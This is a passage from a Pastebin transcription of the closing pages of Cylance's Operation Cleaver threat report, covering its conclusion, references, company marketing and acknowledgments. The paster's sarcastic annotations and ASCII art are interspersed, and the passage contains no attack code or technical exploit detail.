 2814. #%%%####(%%%@@@@(%(%(((((((((##%%%%%@@@@@@#******%&%%&&%&@@@@@@@@@@@@@@@@%%&@@@@@@@%%@%%@%%%%%%(%((
 2815. (%((%@##@@@%%((%%((((((((#####(&%%#@%#%%@@%%% (##@%%%%%%%&@@@@@@@@@@@@@@@@@@@@%@@@&&@%@@@@@@@@%%@((
 2816. (((((%%%@@%#((#%%%%@((((((%%#(#%%%%%%(((%,       .%%%%%%@@@@@@@@@@@@@@@@@@@@@@%@@@@@@@@@@@@@@@@@@@@
 2817. (((#((((%((%%%@@#@@@((((((@@%(%(%%%@@%%((         *@@@%&@@@@@@@@@@#@@@#%@@@@@@@@@@@@@@@@@@@@@@@@@@@
 2818. ##((#(###(@@@@@@@@@@@@#((@@%%%%%%%%%%%%((         ,@@#@@@@@@@@@@@@%@@@&%%#@@@@@@@@@@@@@@@@@@@@@@@@@
 2819. %%%%%%%%%%#@@@%@@%@@@#(%%%(##%%#(##%%((((         ,@&@@@@@@@@@@@@@@@&&@%@@@@%%@@@@@@@@@@@@@@@@@@@@&
 2820. @@@@@@@@@@@&@@@@@%%&@%@(((%%%%%%((((((((%     ... ,@@@@@@@@@@@(#%%%%%%#%%%%%%@#@%%%%%((%@@@@@@@%%%%
 2821. @@@@@@@@@@@@@@@@@@#(@@@@@(%%%%%((((%%((((((      @@@@@&%&@@@#(#%%%%%%%%%%#@@@@#%%%%%%%%%%%%##@@@(%%
 2822. %@@&%@@%%%@@@@@@%@(((((@((((#((#(%%%%%%%%%(      @@@&%%%@@@@%%%%@@%%%%#&%%%@&%%%%%%%%%%%%%((%%%%%%%
 2823. //#(%%%%%@@@@%%(((((((((((((((((%(#%%%##(##..,,, @@@&%@@@%%@@@@@@@%%%%%%%%%%%%%%%%@%%%%%%%((%%@@@%@
 2824. /#((/#%#(%%@(((%(%%%%%((((((#(((%%%%#(((%//..*** @@@@@@@@@#%%@%%%%%%%%%%%%%%@#%%%%%%%((((((((((((((
 2825.  
 2826. [ PG-65 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 2827.  
 2828.  
 2829.  
 2830. [CYLANCE                                                                                  #OPCLEAVER]
 2831.  
 2832.  
 2833. CONCLUSION
 2834.  
 2835. After tracking the Operation Cleaver team for over two years, we’re led to the inexorable conclusion:
 2836. the government of Iran, and particularly the Islamic Revolutionary Guard Corps (IRGC), is backing
 2837. numerous groups and front entities to attack the world’s critical infrastructure.
 2838.  
 2839. As security experts in Critical Infrastructure and Key Resources (CIKR), Industrial Control Systems (ICS),
 2840. Supervisory Control and Data Acquisition (SCADA) systems, Building Management Systems (BMS),
 2841. embedded systems and fixed-function systems, we know how easy they are to hack. We have worked with
 2842. countless customers and vendors throughout the years to notify them of vulnerabilities, assist with
 2843. remediatation efforts, and help mitigate threats to their environments.
 2844.  
 2845. Unfortunately, many critical infrastructure organizations are unable to secure their complex
 2846. environments against modern attacks. They fall victim to the “glue flu”, a malaise of feeling stuck,
 2847. not wanting to change the status quo for fear they will find problems that they have no idea how to
 2848. prevent. This “security anaphylaxis” spells real disaster.
 2849.  
 2850. If Operation Cleaver doesn’t get the world to wake up to what is happening in the silent world of
 2851. cyber, then perhaps nothing will. Prevention is everything and we should never give up until it’s achieved.
 2852.  
 2853. Challenge your trusted advisors. Challenge your security vendors. Demand better technology and services
 2854. to detect, respond, but most importantly PREVENT not just contemporary attacks, but future exotic attacks
 2855. that have yet to be imagined. That is what truly disruptive and innovative technology is. Don’t settle
 2856. for anything less.
 2857.  
 2858. We hope that by exposing the Operation Cleaver team to the world, current global critical infrastructure
 2859. victims can be notified, and prevent future victimization from suffering the consequences of “status quo”
 2860. security. Unlike United Flight 811, perhaps we can prevent the next disaster.
 2861.  
 2862.  
 2863. DEFENDERS, NEVER GIVE UP!
 2864.  
 2865. [ PG-66 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 2866.  
 2867.  
 2868.  
 2869. [CYLANCE                                                                                  #OPCLEAVER]
 2870.  
 2871.  
 2872. REFERENCES
 2873.  
 2874. [1] Aboard Flight 811: Passengers’ Routine Dissolves Into Terror - February 1989
 2875. http://www.nytimes.com/1989/02/26/us/aboard-flight-811-passengers-routine-dissolves-into-terror.html
 2876.  
 2877. [2] “Forget China: Iran’s Hackers Are American’s Newest Cyber Threat” - February 2014
 2878. http://complex.foreignpolicy.com/posts/2014/02/18/forget_china_iran_s_hackers_are_america_s_newest_cyber_threat
 2879.  
 2880. [3] “Developments in Iranian Cyber Warfare 2013-2014” - August 2014
 2881. http://www.inss.org.il/uploadImages/systemFiles/SiboniKronenfeld.pdf
 2882.  
 2883. [4] “Iran ups cyber attacks on Israeli computers: Netanyahu” - June 2013
 2884. http://uk.reuters.com/article/2013/06/09/us-israel-iran-cyber-idUKBRE95808H20130609
 2885.  
 2886. [5] “Iranians hacked Navy network for four months? Not a surprise.” - February 2014
 2887. http://arstechnica.com/information-technology/2014/02/iranians-hacked-navy-network-for-4-months-not-a-surprise/
 2888.  
 2889. [6] “Iran and North Korea Sign Technology Treaty to Combat Hostile Malware” - September 2012
 2890. http://www.v3.co.uk/v3-uk/news/2202493/iran-and-north-korea-sign-technology-treaty-to-combat-hostile-malware#
 2891.  
 2892. [7] “Iran’s Paramilitary Militia Is Recruiting Hackers” - January 2011
 2893. http://www.forbes.com/sites/jeffreycarr/2011/01/12/irans-paramilitary-militia-is-recruiting-hackers/
 2894.  
 2895. [8] “The Iranian Nuclear Weapon” - January 2014
 2896. http://webcache.googleusercontent.com/search?q=cache:eJbMz7vynpQJ:iranredline.org/index.
 2897. php%3Fid%3D22+&cd=1&hl=en&ct=clnk&gl=us
 2898.  
 2899. [9] “HPSR Threat Intelligence Briefing Episode 11, February 2014” - February 2014
 2900. http://www8.hp.com/h20195/v2/getpdf.aspx/4AA5-1589ENW.pdf?ver=1.0
 2901.  
 2902. [10] “Intel boss’ warning on cyber attacks no joke, say experts” - November 2014
 2903. http://www.foxnews.com/world/2014/11/23/intel-boss-warning-on-cyber-attacks-no-joke-say-experts/
 2904.  
 2905. [11] “Khamenei controls massive financial empire built on property seizures” - November 2013
 2906. http://www.reuters.com/investigates/iran/#article/part1
 2907.  
 2908. [12] “Treasury Targets Assets of Iranian Leadership” - June 2013
 2909. http://www.treasury.gov/press-center/press-releases/Pages/jl1968.aspx
 2910.  
 2911. [13] “Internet Censorship in Iran”
 2912. http://en.wikipedia.org/wiki/Internet_censorship_in_Iran
 2913.  
 2914. [14] “Iranian Internet - Fact and Faction”
 2915. http://surveillance.rsf.org/en/iran/
 2916.  
 2917. [15] “Iran readying hacker attacks on U.S. infrastructure, specialists say” - April 2012
 2918. http://www.washingtontimes.com/news/2012/apr/25/iran-readying-hacker-attacks-us-infrastructure-spe/?page=all
 2919.  
 2920. [ PG-67 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 2921.  
 2922.  
 2923.  
 2924. [CYLANCE                                                                                  #OPCLEAVER]
 2925.  
 2926. ABOUT CYLANCE
 2927.  
 2928. In the face of growing and evolving threats, traditional cyber protection technologies are now widely
 2929. considered inadequate. The only way to regain the upper hand against a new generation of attackers, is
 2930. to embrace something entirely new. Something that “thinks” like an attacker. Something that doesn’t
 2931. rely on a trust model or care about hash lookups. Something with a brain.
 2932.  
 2933. “The world has combated cyber threats by doing the same thing over and over again ... it’s the definition
 2934. of insanity!” Jeff Moss - Co-Chair of the DHS Community Resiliency Task Force & Founder of BlackHat and
 2935. DEFCON security conferences
 2936.  
 2937.  
 2938. Cylance has eschewed the old foundations that existing cybersecurity products are built upon. Instead,
 2939. we’ve based our approach on mathematics, machine learning, and data science. This algorithmic approach
 2940. has been proven to detect – and stop – exponentially more modern threats.
 2941.  
 2942. Leveraging algorithmic risk modeling, CylancePROTECT protects endpoints from everyday viruses, worms,
 2943. trojans, and spyware, but unlike other security products, CylancePROTECT offers true future-proof
 2944. protection against the most malicious threats in the world. Advanced Persistent Threats (APT), 0-days,
 2945. and exotic exploitation techniques are easily detected and halted with little-to-no impact on the end-user.
 2946.  
 2947. Existing reactive solutions rely on a constant stream of signature updates for threat detection,
 2948. which is not only costly and inconvenient, but also requires “sacrificial lambs”. Only after a
 2949. previously unseen threat has inflicted damage can the rest of the industry begin to detect it.
 2950. CylancePROTECT doesn’t require constant updates or even a network connection to protect against
 2951. so-called “previously undetectable” threats. By identifying and defusing attacks in near real time,
 2952. before the attack can execute, we can finally do away with the need for a “patient zero”.
 2953.  
 2954. As Richard Stiennon, Chief Research Analyst at IT-Harvest, put it, “Many vendors are trying to
 2955. solve the endpoint problem, yet Cylance is the only one using the power of math to stop malware
 2956. and with more effectiveness and efficiency than current solutions”.
 2957.  
 2958. Interested in seeing what CylancePROTECT can do for your organization? Contact us!
 2959.  
 2960. Cylance is one of the fastest growing cybersecurity technology firms in the US. Cylance’s flagship
 2961. product CylancePROTECT has been adopted by Fortune 500 companies and government agencies across the
 2962. globe. Cylance was founded by 27-year security industry luminary, Stuart McClure, former Global CTO
 2963. of McAfee, original founder of Foundstone, and lead author of the international best-selling book
 2964. Hacking Exposed. In building Cylance, Stuart brought together the best scientific and executive
 2965. minds from the likes of Cisco, Sourcefire, Google and McAfee. The Cylance board of advisors includes
 2966. former high-ranking officials from the DHS, the FBI, CIA, and executive titans of business.
 2967.  
 2968. [ PG-68 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 2969.  
 2970.  
 2971.  
 2972. [CYLANCE                                                                                  #OPCLEAVER]
 2973.  
 2974.  
 2975. CYLANCE PRODUCTS
 2976.  
 2977. CylancePROTECT is the only next generation endpoint security product that applies math to mute
 2978. existing and future malware, viruses, worms, trojans, bots, APTs, 0-days, exploits, adware, spyware
 2979. and hacking tools – without needing any updates or even a connection to the Internet. The technology
 2980. is founded on the principle that to fix the industry, you must start from scratch with a way as yet unseen.
 2981.  
 2982. CylancePROTECT does not rely on signatures of any sort (blacklist or whitelist), behavioral analysis
 2983. using IOCs, sandboxing analysis, heuristics, micro-virtualization, or dynamic detonation – to detect
 2984. and prevent malicious files from executing on a target endpoint.
 2985.  
 2986. While every other endpoint security product must collect a sample, analyze, and write a signature to
 2987. detect it, CylancePROTECT can detect malware before it executes by statically analyzing features
 2988. found in the binary itself.
 2989.  
 2990. Features and Benefits of CylancePROTECT:
 2991.  
 2992.  
 2993. *       Near real time detection of malicious files, even if they’ve never been seen in the wild.
 2994. *       Can be used to augment existing endpoint security or be deployed as a complete replacement.
 2995. *       Does not require any signature updates or connection to the cloud.
 2996. *       An easy-to-use web management console with intuitive workflows.
 2997. *       Low-impact endpoint agent.
 2998.  
 2999.  
 3000. For a demo of CylancePROTECT, contact a Cylance expert today!
 3001.  
 3002. [SHINY PRODUCTS!]
 3003.  
 3004. Figure 26: Cylance products detect and stop all the malware used in Operation Cleaver, even though the
 3005. vast majority of the samples are completely missed by the antivirus industry as of this report’s
 3006. publication.
 3007.  
 3008. [ PG-69 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 3009.  
 3010.  
 3011.  
 3012. [CYLANCE                                                                                  #OPCLEAVER]
 3013.  
 3014. CYLANCE SERVICES
 3015.  
 3016. Cylance’s Professional Services team is available to assist companies affected by this campaign.
 3017. Cylance is providing consulting to companies that may have been targeted by these advanced threat
 3018. actors. Cylance will perform initial triage in order to determine the extent to which your company
 3019. has been affected by this campaign and work towards establishing a containment strategy.
 3020.  
 3021. Cylance has two tailored offerings for clients affected by this campaign. The first one includes
 3022. ICS in our incident response since many companies affected are in the Critical Infrastructure and
 3023. Key Resources (CIKR) vertical. The second offering’s focus is to deploy our proprietary tools and
 3024. methodologies to detect and mitigate the threats posed by Operation Cleaver.
 3025.  
 3026. Option 1:  ICS Incident Response & APT Detection and Mitigation
 3027. Option 2: Detection, Remediation, & Mitigation
 3028.  
 3029.  
 3030. For more information on how the Cylance Professional Services team can assess and respond to attacks
 3031. like the ones obseved in Operation Cleaver, contact sales@cylance.com today.
 3032.  
 3033.  
 3034. [MARKETING!!!]
 3035.  
 3036. [ PG-70 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 3037.  
 3038.  
 3039.  
 3040. [CYLANCE                                                                                  #OPCLEAVER]
 3041.  
 3042.  
 3043. ACKNOWLEDGMENTS
 3044.  
 3045. Brian Wallace <- THIS DOOD ROCKS
 3046. Brian is a Sr. Security Researcher for Cylance who joined shortly after the company was established.
 3047. He is best known for his avid botnet research (often going by “botnet_hunter”) and for his novel malware
 3048. analysis in the A Study in Bots blog series hosted by Cylance. Brian has been a dedicated open-source
 3049. developer as well as an advocate for public and private anti-botnet operations. Brian actively develops
 3050. techniques to combat cyber oppositions in positions where resources and leverage are in too limited of
 3051. supply for conventional means. These techniques, cultivated by Stuart McClure, are the Art of Deterrence.
 3052. In a previous investigation, Art of Deterrence techniques were successfully used to divert Indonesian
 3053. hackers motivated by monetary gain away from their highest yielding target group.
 3054.  
 3055. Brian’s botnet research covers a wide range of topics, from using graph analysis to estimate the amount
 3056. of ransom that has been paid to a ransomware operator, to utilizing IPv4 scanning techniques to identify
 3057. and take down point of sale malware panels.
 3058.  
 3059. Stuart McClure <- <ALSO ROCKS, PRETTY SURE I MET HIM AT A PENTAGON AFCEA MEETING AND GOT A FREE BOOK
 3060. Stuart is founder, CEO/President and Chairman of Cylance. Widely recognized for his extensive and in-depth
 3061. knowledge of security products, Stuart McClure is considered one of the industry’s leading authorities
 3062. in information security today. A well-published and acclaimed security visionary with currently eleven
 3063. books in print, McClure is the originating founder of the Hacking Exposed series of books, the most
 3064. successful security book ever written. From his work, he founded Foundstone in October of 1999 which
 3065. sold to McAfee in 2004.
 3066.  
 3067. McClure brings over two decades of technology and executive leadership with profound technical, operational,
 3068. and financial experience. Besides Foundstone, Stuart held leadership positions at InfoWorld, Ernst & Young,
 3069. Kaiser Permanente and a number of government agencies. At McAfee, McClure held numerous positions including
 3070. SVP/General Manager for the Security Management BU as well as EVP/Global Chief Technology Officer responsible
 3071. for almost $3B worth of revenues. Today, McClure is CEO of Cylance, a disruptive and innovative startup
 3072. applying math to the problem of security. Cylance products such as CylancePROTECT prevent the most advanced
 3073. attacks in the world without signatures or sandboxing in realtime on the endpoint. Cylance Services offer
 3074. highly specialized security services such as incident response, forensics, compromise assessments and
 3075. advanced penetration assessments for global critical infrastructure.
 3076.  
 3077. Cylance Team
 3078. Cylance employees work passionately and tirelessly every day to achieve one goal: Protect the world from
 3079. cyber attacks. And with their efforts in tracking Operation Cleaver, they have achieved that goal. Our
 3080. endless thanks to all the Cylancers who contributed to this report.
 3081.  
 3082. [ PG-71 Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
 3083.  
 3084.  
 3085.  
 3086. For indicators of compromise GOTO  http://jjjjj.us/EJ
 3087.  
 3088.  
 3089.  
 3090.  
 3091. @@@@@@@@@@@@@@@@@@@@@@@@###@@@@(((@@@@@@@@@@@%%#@@@@@@@%###%##%&@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%%
 3092. %#####%%#@@&%%@@@@#%%%%%%%%((%#&@@#%%@@@@@#%%%%@@@#@@@@@@@###%#@@@@@@/@&%%@@@@@@@@@@&@@@@@%#@@@%@@%
 3093. (%%%%#@@@@#%@@#%%%%%%%%%%%%(%%(/@@/@/#%/%((/#(@(@@.(,@((&@&(.%%%#@@@@@%@@@@@@@@@@@@@@%%(@@@####@@%%
 3094. #@@@@@@@@@/(((#%%%%%%%%%(%%%%%###%,%%,@%/(/#@/@.@@/*###,%(@/%*/(%@&@%@@@@@@@@@@@@@@%    %%%%%%%%%%%                                          
 3095. (%%%%#@@@@#%@@#%%%%%%%%%%%%(%%(/@@/@/#%/%((/#(@(@@.(,@((&@&(.%%%#@@@@@%@@@@@@@@@@@@@@%%(@@@####@@%%
 3096. #@@@@@@@@@/(((#%%%%%%%%%(%%%%%###%,%%,@%/(/#@/@.@@/*###,%(@/%*/(%@&@%@@@@@@@@@@@@@@%    %%%%%%%%%%%
 3097. @@@@@@@@@@@%%((&%%@#%#@@%&((,*(.%.%,#%%%%%/,,      .,(&%%#((#*.**(@#@@@@@@@@@@@@.        /########%
 3098. @#&(#&(###@###(///@&&(.%.&(%%#&,       .,**//**,.       .#######@@&@&&%             @@@@@&%@@
 3099. %%%%(%%%%%%%%&(((((((.%(( (.%%%.    *#%%%%%%%%%%%%%#%##*(((,    .#(%#(##(/                 @@@@%%#@
 3100. %%%%%%#####%/(#(((((.(.(,%%%    ,%%%%%%%%%#(*/*%%%###%###%%.,(#*    (&                     .&&&&&&&
 3101. (%%%%%%%%(((((%%%%,(((%   ,%%/%@@/#@@@(@@%%%##%%%##%%%%%%%%/%%##.                          %%%%%%
 3102. (((((((((%%#(((&%%%*%%%   ##//%#,.#@@&&@@@/#%%%%%%%%*#//**(         \                     ,%%%%@
 3103. #(#@(####((%((#@(%%%%   ##%%#(#//%&@%%#(/&@###*#%%%%%%%%#%#*         \ji                      .%%##
 3104. %%@@@@@(((((%%#%.@@.  #%%&@&/@&&&%%%%##*%#(*(%%%%%%%%%%%.            /.((                      *###
 3105. #(((((#%%%(##,@(%@  *@@#/((/*%/(%((&/(%##/#%%%%%%@@%&               (,/"(((__,--.               (##
 3106. (#%%%%%%%@,/&%&@(  @&@@@@&%%/#%#/%///@%%%%%%%%@@&(                      \  ) _( /{        ,//***/##
 3107. (####(#%%,.#%&@#  @@@@@@@&&@@&&#,&@&%%%%%#//%%%//                       !|| " :||               ///
 3108. ((((###(&((%*@/  %%%@@%%%%%%%/*/%%%%%%@@%%(/////////(                   !||   :||            ((((((
 3109. ##%%%%#@#*.(#/   %%%%%%&@%%%%/,,%%%%&@@@@@@@@(#@@@@(//                  '''   '''    ,#%%@%%&//%%%%
 3110. ######%@. ,#%   (%%%%%%%%,(&@@@@@&@@@@@@@@@@@/#@    @(%/                        ,  %%%%#((((//////%
 3111. %%%%%%(%.#,%(  (%%///%%#/%%&@@@#@/&@@@@#  /,  ,#    #%(#(                  *(&*#,. %###/(///(//////
 3112. %%%%%%%%  %%  *(%/%%#/%@@&@@&@@@@%@@@@%   /    ..((,../*/              ,((@@@%/%#/ .///%/%(/%%@@@@@
 3113. %%%%%%*%,@%%  ((#(###@@@@@@@&%/&@@@#  *   #   #.        .(         .#@@@%##@#%//  /%%/%/#%%&/@#%&
 3114. %%%%%%%%*%@#  %%%&@%@@@@%%%%&%&%&%%   (   %   (.   ,      (     (#&&%%%%%%%(*%#&/(  (////%%@@/((&@@
 3115. %%%%%%*.%*((  ##%%((@@######%&%%%   #   #    %   *(      / #%%%&@@@%%%%%%%%/####  *//@@@@@@//@@##
 3116. %%%%%%&&(/((  @@%%%#&@%#@@@@@@&   (   #   .*    .#     (@&%%@@@@@%%%%%%%%(%%%/  /%%%%@%@@%/###(
 3117. %%%%%%(&*(((  &@@@&%((((&@@@@@@@@,*   #  .%#((.  .#        &@@@@@@@@@@@%%%%%%%%%%%  %%%%%%%%%@/%@@@
 3118. %%%%@@/#@@*@  /@@@%@@#@@@@@@@@@  &@,        /         ,@@@@@@@@@@@@@%@@@/%%%%( .%%%%%%%%%%%%%%@
 3119. %%%@@@@, &@@(  &@@@@%@@@@@#(%&/(% (*          (.          (#/((@@@@@@@@%&&(%%%%. %#%%%%%%%@%%&@@@
 3120. %%@&@@@,@,@%@. ,@@@@%@@@@(((%&@#            .%          /#%%%%%%/&&&@@@@@@#(#&/  @(#%%%%#(#%%%%@@
 3121. %%%&%@@@,@&&@@  @@@@@#@@@&@@%            .%%%,        *# /#%#%##%(#@@@@@@@@%%,%%  (@##%%%%%%%#@
 3122. %%%%#@@@@**%/  @@@@%#@@@@@,          /.  *%       (/  #%%###%@@@(@@@@@@%(/(%(  ,%%%%%#%%%%%%%%%%%
 3123. %%%%%%%%%%%.%,@#  @@@@@&@@@@&       .(       #    (/   ###%%%##%%%@@@@&%/*/,/(  *%%#%#%%%%%@@%%%%%%
 3124. %%%&@@#@@%## (%%(  @@@@%@@@@@%   .(%    ###(,         %%%%%%%%%%%/%%%@%/*&&@&  ,%%%%#%%#%%%%%%%%@@%
 3125. %%%%%#@@%@@%,/@*%#  %@@@@%@@@@@@&@@@&%               %%%%%%%%%%%%%#%%%%(#%%/  ,%%%%%#@@@@@@@@@@@@@@
 3126. %@@&%%%%%%%%@@%,/((,  (##%#%&@@@@@@#(#              .%%%@%%%%%%%%%/#/%@@@%   %%%%%%@@@@@@@@@@@@@@@@
 3127. %##%%%%%%@@%#*#* (&%(   #%#*&@@@@@#@@@              .%%%%%#(((%%%%%####%   ###%%%%@@@@@&@@@@@@@@@@@
 3128. %%%%%%%%%@%(#@%@**(.(%%   (#((#**#@@@&              .#######/########(   *%%%@&%&&@@&@@@@&@@@@@@@@@
 3129. %%%%%%%%%###@@@@ .(.@#@@@   .#/(%@@@&&              .%####%########,   (%@#@#@@@@@%@@@%%@@@@@@@@@@@
 3130. #%%%%@@@@@@@@##((@,@*(,(/%%.   ,&/&%##              .###########,   .##&@%@@@@@@@%@@&@&@@@@@@&%%@@%
 3131. #@@@@@@@@@@(@@@@@@@%@.#,%.((%%#     ,(              .##%#%%*    .#%%%%%%#@@@%@@%@@@@@@@@@@@@@@@@@@@
 3132. @@@@@@((((((@@@@@@@@((#@/, (*(%%%%&.                         &%%%%%%%&@@%#@&@@@@@@@@&@@@@@@@@@@@@@@
 3133. @@@@@@%%@@(@@@@@@@(((%%%%%%%* %.%,%%%%               ##////%&/%&@@%@%@@%&%&@@@@&&&@&@@@@@@@@@@@@@@@
 3134. &@@(%@@@@@@@@@@@%@%%%%%((%%%%%/#,%%%%%              /////////@@@@@@@@@@@@@@@@@@@@@#%((@@@%@@@#@@@@@
 3135. ((((%#@@%@@%##@@#%((%(%((#/////////#&/         ./&%%&&&/@@@@@@@@@@@@@@@@@@@@&@@@@@@@@@@(%%#%%%%%%%%
 3136. (###%%%%%@@%@%%%#@@%###%#/////%//@@&(/     (   ./&%%%%&@@@@@@%&/@@((/@@@@@###%@%@@@@@#%@@@@@@#@@%%%
 3137. (%%%%%%%%%%%##@@@#%%%%&&&&&&@/@@@@@/@#.%&&(/   ,&/%%%%%%@@@@@///%%////(@%%%%%%%%@@@%%@@@@@@@@@@%%%%
 3138. #@@%%%%%%%%%%%%%%%@@@@@@@@@@@@@@@@@&%%%%%%%%   .%@//(////////////////////@&%@%@@/@###%%%%((((((%%((
 3139. %%%%%%%%%%%%%%%@@@@@@@@@@@@@@/@@@@#%%%%%%%%%   ,@@@@&%@@@%//%////%/%%%%/@#@@@@@/@//@@@/%%%%%(((((%@
 3140. %%%%%%%%%%(%@@@@#%#(#((((@@(%%%%%%%%%@#@@     (@@@@@@@%@#@&%%%@@@@@@@@%&@@@@@///@@@#%%%(#%%%(#%%%
 3141. #%%%####(%%%@@@@(%(%(((((((((##%%%%%@@@@@@#******%&%%&&%&@@@@@@@@@@@@@@@@%%&@@@@@@@%%@%%@%%%%%%(%((
 3142. (%((%@##@@@%%((%%((((((((#####(&%%#@%#%%@@%%% (##@%%%%%%%&@@@@@@@@@@@@@@@@@@@@%@@@&&@%@@@@@@@@%%@((
 3143. (((((%%%@@%#((#%%%%@((((((%%#(#%%%%%%(((%,       .%%%%%%@@@@@@@@@@@@@@@@@@@@@@%@@@@@@@@@@@@@@@@@@@@
 3144. (((#((((%((%%%@@#@@@((((((@@%(%(%%%@@%%((         *@@@%&@@@@@@@@@@#@@@#%@@@@@@@@@@@@@@@@@@@@@@@@@@@
 3145. ##((#(###(@@@@@@@@@@@@#((@@%%%%%%%%%%%%((         ,@@#@@@@@@@@@@@@%@@@&%%#@@@@@@@@@@@@@@@@@@@@@@@@@
 3146. %%%%%%%%%%#@@@%@@%@@@#(%%%(##%%#(##%%((((         ,@&@@@@@@@@@@@@@@@&&@%@@@@%%@@@@@@@@@@@@@@@@@@@@&
 3147. @@@@@@@@@@@&@@@@@%%&@%@(((%%%%%%((((((((%     ... ,@@@@@@@@@@@(#%%%%%%#%%%%%%@#@%%%%%((%@@@@@@@%%%%
 3148. @@@@@@@@@@@@@@@@@@#(@@@@@(%%%%%((((%%((((((      @@@@@&%&@@@#(#%%%%%%%%%%#@@@@#%%%%%%%%%%%%##@@@(%%
 3149. %@@&%@@%%%@@@@@@%@(((((@((((#((#(%%%%%%%%%(      @@@&%%%@@@@%%%%@@%%%%#&%%%@&%%%%%%%%%%%%%((%%%%%%%
 3150. //#(%%%%%@@@@%%(((((((((((((((((%(#%%%##(##..,,, @@@&%@@@%%@@@@@@@%%%%%%%%%%%%%%%%@%%%%%%%((%%@@@%@
 3151. /#((/#%#(%%@(((%(%%%%%((((((#(((%%%%#(((%//..*** @@@@@@@@@#%%@%%%%%%%%%%%%%%@#%%%%%%%((((((((((((((
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top